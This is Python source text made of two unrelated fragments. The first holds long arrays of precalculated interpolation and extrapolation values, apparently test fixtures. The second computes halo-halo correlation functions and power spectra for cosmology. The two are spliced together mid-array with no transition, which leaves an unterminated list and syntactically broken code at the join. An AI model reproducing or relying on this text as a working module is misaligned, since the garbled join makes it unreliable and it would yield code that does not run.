-1.140407180451E+19, -9.241435356589E+18, 6.446759109720E+19, 6.446759109720E+19, -9.241435356589E+18, -1.140407180451E+19, 1.283205555674E+19, -4.876973734940E+18], [-4.876973734940E+18, 1.283205555674E+19, -1.140407180451E+19, -9.241435356589E+18, 6.446759109720E+19, 6.446759109720E+19, -9.241435356589E+18, -1.140407180451E+19, 1.283205555674E+19, -4.876973734940E+18], [-7.975908114097E+18, 1.052139178127E+19, 1.734970013481E+18, -2.145503300375E+19, -9.241435356589E+18, -9.241435356589E+18, -2.145503300375E+19, 1.734970013480E+18, 1.052139178127E+19, -7.975908114097E+18], [-8.474851229653E+18, -9.251264987298E+16, 1.283205555674E+19, 1.734970013480E+18, -1.140407180451E+19, -1.140407180451E+19, 1.734970013480E+18, 1.283205555674E+19, -9.251264987296E+16, -8.474851229653E+18], [-5.031133752816E+17, -9.121921863446E+18, -9.251264987298E+16, 1.052139178127E+19, 1.283205555674E+19, 1.283205555674E+19, 1.052139178127E+19, -9.251264987296E+16, -9.121921863446E+18, -5.031133752816E+17], [7.049456954407E+18, -5.031133752816E+17, -8.474851229653E+18, -7.975908114097E+18, -4.876973734940E+18, -4.876973734940E+18, -7.975908114097E+18, -8.474851229653E+18, -5.031133752816E+17, 7.049456954407E+18]], dtype=np.float64 ) #: array holding precalculated quadratic extrapolation data self.precalc_extrapolation_quadratic: np.array = np.array( [], dtype=np.float64 ) def setup_cubic(self): self.precalc_interpolation = np.array( [[7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18], [1.414501923764E+18, -6.879873015236E+18, -6.604387574162E+18, -9.273861048722E+16, 7.815453486867E+18, 1.087722976395E+19, 1.179639375775E+19, 1.087722976395E+19, 7.815453486864E+18, -9.273861048516E+16, -6.604387574163E+18, -6.879873015260E+18, 1.414501923709E+18], [-4.992201892782E+18, -6.604387574159E+18, 7.662704616480E+17, 8.927226959209E+18, 8.733637329413E+18, 3.144134389938E+18, 8.046419412828E+17, 3.144134389934E+18, 8.733637329421E+18, 8.927226959216E+18, 7.662704616522E+17, -6.604387574177E+18, -4.992201892789E+18], [-9.006647501668E+18, -9.273861045643E+16, 8.927226959223E+18, 9.500724468548E+18, -3.879550824799E+18, -1.262756473835E+19, -1.571105597160E+19, -1.262756473838E+19, -3.879550824803E+18, 9.500724468565E+18, 8.927226959332E+18, -9.273861058776E+16, -9.006647501760E+18], [-7.975908114094E+18, 7.815453486869E+18, 8.733637329383E+18, -3.879550824786E+18, -2.145503300374E+19, -1.226583807440E+19, -7.714735650690E+18, -1.226583807425E+19, -2.145503300392E+19, -3.879550825037E+18, 8.733637328991E+18, 7.815453486779E+18, -7.975908114134E+18], [-5.494750801433E+18, 1.087722976395E+19, 3.144134389889E+18, -1.262756473834E+19, -1.226583807434E+19, 3.691392206497E+19, 5.727262813613E+19, 3.691392206533E+19, -1.226583807459E+19, -1.262756473889E+19, 3.144134390513E+18, 1.087722976389E+19, -5.494750801509E+18], [-4.489606937542E+18, 1.179639375775E+19, 8.046419412881E+17, -1.571105597160E+19, -7.714735650701E+18, 5.727262813612E+19, 8.385571378575E+19, 5.727262813618E+19, -7.714735650696E+18, -1.571105597161E+19, 8.046419412838E+17, 1.179639375773E+19, -4.489606937591E+18], [-5.494750801434E+18, 1.087722976395E+19, 3.144134390093E+18, -1.262756473833E+19, -1.226583807460E+19, 3.691392206464E+19, 5.727262813614E+19, 3.691392206388E+19, -1.226583807413E+19, -1.262756473809E+19, 3.144134391132E+18, 1.087722976399E+19, -5.494750801389E+18], [-7.975908114416E+18, 7.815453486610E+18, 8.733637329526E+18, -3.879550824930E+18, -2.145503300385E+19, -1.226583807444E+19, -7.714735650699E+18, -1.226583807452E+19, -2.145503300371E+19, -3.879550825350E+18, 8.733637329826E+18, 7.815453486864E+18, -7.975908110886E+18], [-9.006647502091E+18, -9.273861080508E+16, 8.927226959362E+18, 9.500724468432E+18, -3.879550824923E+18, -1.262756473862E+19, -1.571105597161E+19, -1.262756473885E+19, -3.879550824244E+18, 9.500724467988E+18, 8.927226956139E+18, -9.273860862352E+16, -9.006647499242E+18], [-4.992201892748E+18, -6.604387574117E+18, 7.662704614151E+17, 8.927226959268E+18, 8.733637329008E+18, 3.144134390448E+18, 8.046419412263E+17, 3.144134389968E+18, 8.733637329917E+18, 8.927226958675E+18, 7.662704629822E+17, -6.604387573416E+18, -4.992201892348E+18], [1.414501923439E+18, -6.879873015445E+18, -6.604387573988E+18, -9.273861059517E+16, 7.815453486837E+18, 1.087722976397E+19, 1.179639375772E+19, 1.087722976397E+19, 7.815453486894E+18, -9.273860926067E+16, -6.604387573672E+18, -6.879873017304E+18, 1.414501925358E+18], [7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18]], dtype=np.float64 ) self.precalc_extrapolation_nearest: np.array = np.array( [7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 1.414501923721E+18, -4.992201892784E+18, -9.006647501706E+18, -7.975908114096E+18, -5.494750801436E+18, -4.489606937545E+18, -5.494750801434E+18, -7.975908114100E+18, -9.006647501698E+18, -4.992201892788E+18, 1.414501923683E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954460E+18, 7.049456954376E+18, 7.049456954376E+18, 7.049456954376E+18, 1.414501923764E+18, 1.414501923764E+18, 1.414501923764E+18, 1.414501923709E+18, 1.414501923709E+18, 1.414501923709E+18, -4.992201892782E+18, -4.992201892782E+18, -4.992201892782E+18, -4.992201892789E+18, -4.992201892789E+18, -4.992201892789E+18, -9.006647501668E+18, -9.006647501668E+18, -9.006647501668E+18, -9.006647501760E+18, -9.006647501760E+18, -9.006647501760E+18, -7.975908114094E+18, -7.975908114094E+18, -7.975908114094E+18, -7.975908114134E+18, -7.975908114134E+18, -7.975908114134E+18, -5.494750801433E+18, -5.494750801433E+18, -5.494750801433E+18, -5.494750801509E+18, -5.494750801509E+18, -5.494750801509E+18, -4.489606937542E+18, -4.489606937542E+18, -4.489606937542E+18, -4.489606937591E+18, -4.489606937591E+18, -4.489606937591E+18, -5.494750801434E+18, -5.494750801434E+18, -5.494750801434E+18, -5.494750801389E+18, -5.494750801389E+18, -5.494750801389E+18, -7.975908114416E+18, -7.975908114416E+18, -7.975908114416E+18, -7.975908110886E+18, -7.975908110886E+18, -7.975908110886E+18, -9.006647502091E+18, -9.006647502091E+18, -9.006647502091E+18, -9.006647499242E+18, -9.006647499242E+18, -9.006647499242E+18, -4.992201892748E+18, -4.992201892748E+18, -4.992201892748E+18, -4.992201892348E+18, -4.992201892348E+18, -4.992201892348E+18, 1.414501923439E+18, 1.414501923439E+18, 1.414501923439E+18, 1.414501925358E+18, 1.414501925358E+18, 1.414501925358E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 7.049456954108E+18, 1.414501923499E+18, -4.992201892571E+18, -9.006647501872E+18, -7.975908114100E+18, -5.494750801478E+18, -4.489606937572E+18, -5.494750801431E+18, -7.975908113487E+18, -9.006647502955E+18, -4.992201893463E+18, 1.414501925348E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18, 7.049456956398E+18], dtype=np.float64 ) #: array holding precalculated linear extrapolation data self.precalc_extrapolation_linear: np.array = np.array( [5.663043205226E+19, 6.276115134204E+19, 6.889187063182E+19, 7.502258992160E+19, 8.801800967422E+19, 2.361337399095E+18, -1.138639225842E+20, -1.744516071724E+20, -1.684506962764E+20, -1.629840661335E+20, -1.684506962764E+20, -1.744516071724E+20, -1.138639225842E+20, 2.361337399095E+18, 8.801800967422E+19, 7.502258992160E+19, 6.889187063182E+19, 6.276115134204E+19, 5.663043205226E+19, 6.276115134204E+19, 5.929572720554E+19, 5.583030306904E+19, 5.236487893254E+19, 5.915017375739E+19, -8.984236486837E+16, -7.891149755669E+19, -1.189597074863E+20, -1.141320477848E+20, -1.101525797349E+20, -1.141320477848E+20, -1.189597074863E+20, -7.891149755669E+19, -8.984236486841E+16, 5.915017375739E+19, 5.236487893254E+19, 5.583030306904E+19, 5.929572720554E+19, 6.276115134204E+19, 6.889187063182E+19, 5.583030306904E+19, 4.276873550626E+19, 2.970716794347E+19, 3.028233784055E+19, -2.541022128832E+18, -4.395907252919E+19, -6.346780780020E+19, -5.981339929310E+19, -5.732109333620E+19, -5.981339929310E+19, -6.346780780020E+19, -4.395907252919E+19, -2.541022128832E+18, 3.028233784055E+19, 2.970716794347E+19, 4.276873550626E+19, 5.583030306904E+19, 6.889187063182E+19, 7.502258992160E+19, 5.236487893254E+19, 2.970716794347E+19, 2.970716794347E+19, 5.236487893254E+19, 7.502258992160E+19, 8.801800967422E+19, 5.915017375739E+19, 3.028233784055E+19, 3.028233784055E+19, 5.915017375739E+19, 8.801800967422E+19, 2.361337399095E+18, -8.984236486837E+16, -2.541022128832E+18, -2.541022128832E+18, -8.984236486841E+16, 2.361337399095E+18, -1.138639225842E+20, -7.891149755669E+19, -4.395907252919E+19, -4.395907252919E+19, -7.891149755669E+19, -1.138639225842E+20, -1.744516071724E+20, -1.189597074863E+20, -6.346780780020E+19, -6.346780780020E+19, -1.189597074863E+20, -1.744516071724E+20, -1.684506962764E+20, -1.141320477848E+20, -5.981339929310E+19, -5.981339929310E+19, -1.141320477848E+20, -1.684506962764E+20, -1.629840661335E+20, -1.101525797349E+20, -5.732109333620E+19, -5.732109333620E+19, -1.101525797349E+20, -1.629840661335E+20, -1.684506962764E+20, -1.141320477848E+20, -5.981339929310E+19, -5.981339929310E+19, -1.141320477848E+20, -1.684506962764E+20, -1.744516071724E+20, -1.189597074863E+20, -6.346780780020E+19, -6.346780780020E+19, -1.189597074863E+20, -1.744516071724E+20, -1.138639225842E+20, -7.891149755669E+19, -4.395907252919E+19, -4.395907252920E+19, -7.891149755669E+19, -1.138639225842E+20, 2.361337399095E+18, -8.984236486840E+16, -2.541022128832E+18, -2.541022128832E+18, -8.984236486853E+16, 2.361337399095E+18, 8.801800967422E+19, 5.915017375739E+19, 3.028233784055E+19, 3.028233784055E+19, 5.915017375739E+19, 8.801800967422E+19, 7.502258992160E+19, 5.236487893254E+19, 2.970716794347E+19, 2.970716794347E+19, 5.236487893254E+19, 7.502258992161E+19, 6.889187063182E+19, 5.583030306904E+19, 4.276873550626E+19, 2.970716794347E+19, 3.028233784055E+19, -2.541022128832E+18, -4.395907252919E+19, -6.346780780020E+19, -5.981339929310E+19, -5.732109333620E+19, -5.981339929310E+19, -6.346780780020E+19, -4.395907252919E+19, -2.541022128832E+18, 3.028233784055E+19, 2.970716794347E+19, 4.276873550626E+19, 5.583030306905E+19, 6.889187063183E+19, 6.276115134204E+19, 5.929572720554E+19, 5.583030306904E+19, 5.236487893254E+19, 5.915017375739E+19, -8.984236486838E+16, -7.891149755669E+19, -1.189597074863E+20, -1.141320477848E+20, -1.101525797349E+20, -1.141320477848E+20, -1.189597074863E+20, -7.891149755669E+19, -8.984236486857E+16, 5.915017375739E+19, 5.236487893254E+19, 5.583030306905E+19, 5.929572720555E+19, 6.276115134206E+19, 5.663043205226E+19, 6.276115134204E+19, 6.889187063182E+19, 7.502258992160E+19, 8.801800967422E+19, 2.361337399095E+18, -1.138639225842E+20, -1.744516071724E+20, -1.684506962764E+20, -1.629840661335E+20, -1.684506962764E+20, -1.744516071724E+20, -1.138639225842E+20, 2.361337399095E+18, 8.801800967422E+19, 7.502258992161E+19, 6.889187063183E+19, 6.276115134206E+19, 5.663043205228E+19], dtype=np.float64 ) def setup_linear(self): self.precalc_interpolation = np.array( [[7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18], [1.385029207141E+18, -4.879157504269E+18, -4.577658518112E+18, -1.668062692568E+17, 5.897066807427E+18, 7.777865377223E+18, 8.404798233821E+18, 7.777865377223E+18, 5.897066807427E+18, -1.668062692568E+17, -4.577658518112E+18, -4.879157504269E+18, 1.385029207141E+18], [-4.488982302467E+18, -4.577658518112E+18, 8.812770983874E+17, 6.309373814419E+18, 6.128180897374E+18, 2.067539131431E+18, 7.139918761166E+17, 2.067539131431E+18, 6.128180897374E+18, 6.309373814419E+18, 8.812770983874E+17, -4.577658518112E+18, -4.488982302467E+18], [-8.350115450764E+18, -1.668062692568E+17, 6.309373814419E+18, 6.527705442988E+18, -4.062530740828E+18, -9.163192204604E+18, -1.086341269253E+19, -9.163192204604E+18, -4.062530740828E+18, 6.527705442988E+18, 6.309373814419E+18, -1.668062692568E+17, -8.350115450764E+18], [-7.975908114097E+18, 5.897066807427E+18, 6.128180897374E+18, -4.062530740828E+18, -2.145503300375E+19, -1.229483476838E+19, -9.241435356589E+18, -1.229483476838E+19, -2.145503300375E+19, -4.062530740828E+18, 6.128180897374E+18, 5.897066807427E+18, -7.975908114097E+18], [-5.651707329729E+18, 7.777865377223E+18, 2.067539131431E+18, -9.163192204604E+18, -1.229483476838E+19, 3.145654217072E+19, 4.604033448375E+19, 3.145654217072E+19, -1.229483476838E+19, -9.163192204604E+18, 2.067539131431E+18, 7.777865377223E+18, -5.651707329729E+18], [-4.876973734940E+18, 8.404798233821E+18, 7.139918761166E+17, -1.086341269253E+19, -9.241435356589E+18, 4.604033448375E+19, 6.446759109720E+19, 4.604033448375E+19, -9.241435356589E+18, -1.086341269253E+19, 7.139918761166E+17, 8.404798233821E+18, -4.876973734940E+18], [-5.651707329729E+18, 7.777865377223E+18, 2.067539131431E+18, -9.163192204604E+18, -1.229483476838E+19, 3.145654217072E+19, 4.604033448375E+19, 3.145654217072E+19, -1.229483476838E+19, -9.163192204604E+18, 2.067539131431E+18, 7.777865377223E+18, -5.651707329729E+18], [-7.975908114097E+18, 5.897066807427E+18, 6.128180897374E+18, -4.062530740828E+18, -2.145503300375E+19, -1.229483476838E+19, -9.241435356589E+18, -1.229483476838E+19, -2.145503300375E+19, -4.062530740828E+18, 6.128180897374E+18, 5.897066807427E+18, -7.975908114097E+18], [-8.350115450764E+18, -1.668062692568E+17, 6.309373814419E+18, 6.527705442988E+18, -4.062530740828E+18, -9.163192204604E+18, -1.086341269253E+19, -9.163192204604E+18, -4.062530740828E+18, 6.527705442988E+18, 6.309373814419E+18, -1.668062692568E+17, -8.350115450764E+18], [-4.488982302467E+18, -4.577658518112E+18, 8.812770983874E+17, 6.309373814419E+18, 6.128180897374E+18, 2.067539131431E+18, 7.139918761166E+17, 2.067539131431E+18, 6.128180897374E+18, 6.309373814419E+18, 8.812770983874E+17, -4.577658518112E+18, -4.488982302467E+18], [1.385029207141E+18, -4.879157504269E+18, -4.577658518112E+18, -1.668062692568E+17, 5.897066807427E+18, 7.777865377223E+18, 8.404798233821E+18, 7.777865377223E+18, 5.897066807427E+18, -1.668062692568E+17, -4.577658518112E+18, -4.879157504269E+18, 1.385029207141E+18], [7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18]], dtype=np.float64 ) self.precalc_extrapolation_nearest: np.array = np.array( [7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -7.975908114097E+18, -7.975908114097E+18,
\ xi_tree * (1-np.exp(-(xs/rswitch)**4)) elif logdens1 < -5.75 and logdens2 >= -5.75: xi_dir = self._get_xiauto_direct( xs, -5.75, logdens2, redshift) * self.g1.bias_ratio(redshift, logdens1) rswitch = min(60., 0.5 * self.cosmo.get_BAO_approx()) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + \ xi_tree * (1-np.exp(-(xs/rswitch)**4)) else: xi_dir = self._get_xiauto_direct(xs, -5.75, -5.75, redshift) * self.g1.bias_ratio( redshift, logdens1)*self.g1.bias_ratio(redshift, logdens2) rswitch = min(60., 0.5 * self.cosmo.get_BAO_approx()) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + \ xi_tree * (1-np.exp(-(xs/rswitch)**4)) return iuspline(xs, xi_tot) def get_xiauto_massthreshold(self, xs, Mthre, redshift): """get_xiauto_massthreshold Compute the halo-halo correlation function, :math:`\\xi_\mathrm{hh}(x;>M_\mathrm{th})`, for a mass threshold halo sample. Args: xs (numpy array): Separations in :math:`[h^{-1}\mathrm{Mpc}]` Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]` redshift (float): Redshift at which the correlation function is evaluated Returns: numpy array: Halo correlation function """ logdens = np.log10(self.mass_to_dens(Mthre, redshift)) return self.get_xiauto(xs, logdens, logdens, redshift) def get_xiauto_mass(self, xs, M1, M2, redshift): """get_xiauto_mass Compute the halo-halo correlation function, :math:`\\xi_\mathrm{hh}(x;M_1,M_2)`, between 2 halo samples with mass :math:`M_1` and :math:`M_2`. Args: xs (numpy array): Separations in :math:`[h^{-1}\mathrm{Mpc}]` M1 (float): Halo mass of the first sample in :math:`[h^{-1}M_\odot]` M2 (float): Halo mass of the second sample in :math:`[h^{-1}M_\odot]` redshift (float): Redshift at which the correlation function is evaluated Returns: numpy array: Halo correlation function """ M1p = M1 * 1.01 M1m = M1 * 0.99 M2p = M2 * 1.01 M2m = M2 * 0.99 dens1p = self.mass_to_dens(M1p, redshift) dens1m = self.mass_to_dens(M1m, redshift) dens2p = self.mass_to_dens(M2p, redshift) dens2m = self.mass_to_dens(M2m, redshift) logdens1p, logdens1m, logdens2p, logdens2m = np.log10( dens1p), np.log10(dens1m), np.log10(dens2p), np.log10(dens2m) ximm = self.get_xiauto(xs, logdens1m, logdens2m, redshift) ximp = self.get_xiauto(xs, logdens1m, logdens2p, redshift) xipm = self.get_xiauto(xs, logdens1p, logdens2m, redshift) xipp = self.get_xiauto(xs, logdens1p, logdens2p, redshift) numer = ximm * dens1m * dens2m - ximp * dens1m * dens2p - \ xipm * dens1p * dens2m + xipp * dens1p * dens2p denom = dens1m * dens2m - dens1m * dens2p - dens1p * dens2m + dens1p * dens2p return numer / denom def _get_phh_tree(self,ks,logdens1,logdens2,redshift): g1 = self.g1.get(ks,redshift,logdens1) g2 = self.g1.get(ks,redshift,logdens2) pm_lin = self.get_pklin(ks) ph_tree = g1 * g2 * pm_lin return ph_tree def _get_phh_direct(self,ks,logdens1,logdens2,redshift): xs = np.logspace(-3,3,4000) xihh = self.xi_auto.get(xs,redshift,logdens1,logdens2) return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs,xihh))(ks) def get_phh(self,ks,logdens1,logdens2,redshift): """get_phh Compute the halo-halo power spectrum :math:`P_{hh}(k;n_1,n_2)` between 2 mass threshold halo samples specified by the corresponding cumulative number densities. Args: ks (numpy array): Wavenumbers in :math:`[h\mathrm{Mpc}^{-1}]` logdens1 (float): Logarithm of the cumulative halo number density of the first halo sample taken from the most massive, :math:`\log_{10}[n_1/(h^{-1}\mathrm{Mpc})^3]` logdens2 (float): Logarithm of the cumulative halo number density of the second halo sample taken from the most massive, :math:`\log_{10}[n_2/(h^{-1}\mathrm{Mpc})^3]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: halo power spectrum in :math:`[(h^{-1}\mathrm{Mpc})^{3}]` """ xs = np.logspace(-3,3,4000) xi_tree = self._get_xiauto_tree(xs,logdens1,logdens2,redshift) rswitch = min(60.,0.5 * self.cosmo.get_BAO_approx()) if logdens1 >= -5.75 and logdens2 >= -5.75: xi_dir = self._get_xiauto_direct(xs,logdens1,logdens2,redshift) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4)) elif logdens1 >= -5.75 and logdens2 < -5.75: xi_dir = self._get_xiauto_direct(xs,logdens1,-5.75,redshift) * self.g1.bias_ratio(redshift,logdens2) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4)) elif logdens1 < -5.75 and logdens2 >= -5.75: xi_dir = self._get_xiauto_direct(xs,-5.75,logdens2,redshift) * self.g1.bias_ratio(redshift,logdens1) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4)) else: xi_dir = self._get_xiauto_direct(xs,-5.75,-5.75,redshift) * self.g1.bias_ratio(redshift,logdens1)*self.g1.bias_ratio(redshift,logdens2) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4)) return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs,xi_tot))(ks) def _get_phh_tree_cut(self,ks,logdens1,logdens2,redshift): xs = np.logspace(-3,3,4000) xi_tree = self._get_xiauto_tree(xs,logdens1,logdens2,redshift) rswitch = min(60.,0.5 * self.cosmo.get_BAO_approx()) xi_tot = xi_tree * (1-np.exp(-(xs/rswitch)**4)) return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs,xi_tot))(ks) def _get_phh_direct_cut(self,ks,logdens1,logdens2,redshift): xs = np.logspace(-3,3,4000) rswitch = min(60.,0.5 * self.cosmo.get_BAO_approx()) if logdens1 >= -5.75 and logdens2 >= -5.75: xi_dir = self._get_xiauto_direct(xs,logdens1,logdens2,redshift) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) elif logdens1 >= -5.75 and logdens2 < -5.75: xi_dir = self._get_xiauto_direct(xs,logdens1,-5.75,redshift) * self.g1.bias_ratio(redshift,logdens2) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) elif logdens1 < -5.75 and logdens2 >= -5.75: xi_dir = self._get_xiauto_direct(xs,-5.75,logdens2,redshift) * self.g1.bias_ratio(redshift,logdens1) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) else: xi_dir = self._get_xiauto_direct(xs,-5.75,-5.75,redshift) * self.g1.bias_ratio(redshift,logdens1)*self.g1.bias_ratio(redshift,logdens2) xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs,xi_tot))(ks) def get_phh_massthreshold(self,ks,Mthre,redshift): """get_phh_massthreshold Compute the halo-halo auto power spectrum :math:`P_{hh}(k;>M_\mathrm{th})` for a mass threshold halo sample. Args: ks (numpy array): Wavenumbers in :math:`[h\mathrm{Mpc}^{-1}]` Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: halo power spectrum in :math:`[(h^{-1}\mathrm{Mpc})^{3}]` """ logdens = np.log10(self.mass_to_dens(Mthre,redshift)) return self.get_phh(ks,logdens,logdens,redshift) def get_phh_mass(self,ks,M1,M2,redshift): """get_phh_mass Compute the halo-halo power spectrum :math:`P_{hh}(k;M_1,M_2)` between 2 halo samples with mass :math:`M_1` and :math:`M_2`. Args: ks (numpy array): Wavenumbers in :math:`[h\mathrm{Mpc}^{-1}]` M1 (float): Halo mass of the first sample in :math:`[h^{-1}M_\odot]` M2 (float): Halo mass of the second sample in :math:`[h^{-1}M_\odot]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: halo power spectrum in :math:`[(h^{-1}\mathrm{Mpc})^{3}]` """ M1p = M1 * 1.01 M1m = M1 * 0.99 M2p = M2 * 1.01 M2m = M2 * 0.99 dens1p = self.mass_to_dens(M1p,redshift) dens1m = self.mass_to_dens(M1m,redshift) dens2p = self.mass_to_dens(M2p,redshift) dens2m = self.mass_to_dens(M2m,redshift) logdens1p, logdens1m, logdens2p, logdens2m = np.log10(dens1p), np.log10(dens1m), np.log10(dens2p), np.log10(dens2m) pmm = self.get_phh(ks,logdens1m,logdens2m,redshift) pmp = self.get_phh(ks,logdens1m,logdens2p,redshift) ppm = self.get_phh(ks,logdens1p,logdens2m,redshift) ppp = self.get_phh(ks,logdens1p,logdens2p,redshift) numer = pmm * dens1m * dens2m - pmp * dens1m * dens2p - ppm * dens1p * dens2m + ppp * dens1p * dens2p denom = dens1m * dens2m - dens1m * dens2p - dens1p * dens2m + dens1p * dens2p return numer / denom def get_wauto(self, R2d, logdens1, logdens2, redshift): """get_wauto Compute the projected halo-halo correlation function :math:`w_{hh}(R;n_1,n_2)` for 2 mass threshold halo samples specified by the corresponding cumulative number densities. Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` logdens1 (float): Logarithm of the cumulative halo number density of the first halo sample taken from the most massive, :math:`\log_{10}[n_1/(h^{-1}\mathrm{Mpc})^3]` logdens2 (float): Logarithm of the cumulative halo number density of the second halo sample taken from the most massive, :math:`\log_{10}[n_2/(h^{-1}\mathrm{Mpc})^3]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: projected halo correlation function in :math:`[h^{-1}\mathrm{Mpc}]` """ xs = np.logspace(-3, 3, 1000) xi_auto = self.get_xiauto(xs, logdens1, logdens2, redshift) pk_spl = pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs, xi_auto)) return pyfftlog_interface.pk2xiproj_J0_pyfftlog(pk_spl, logkmin=-3.0, logkmax=3.0)(R2d) def get_wauto_cut(self, R2d, logdens1, logdens2, redshift, pimax, integration="quad"): """get_wauto_cut Compute the projected halo-halo correlation function 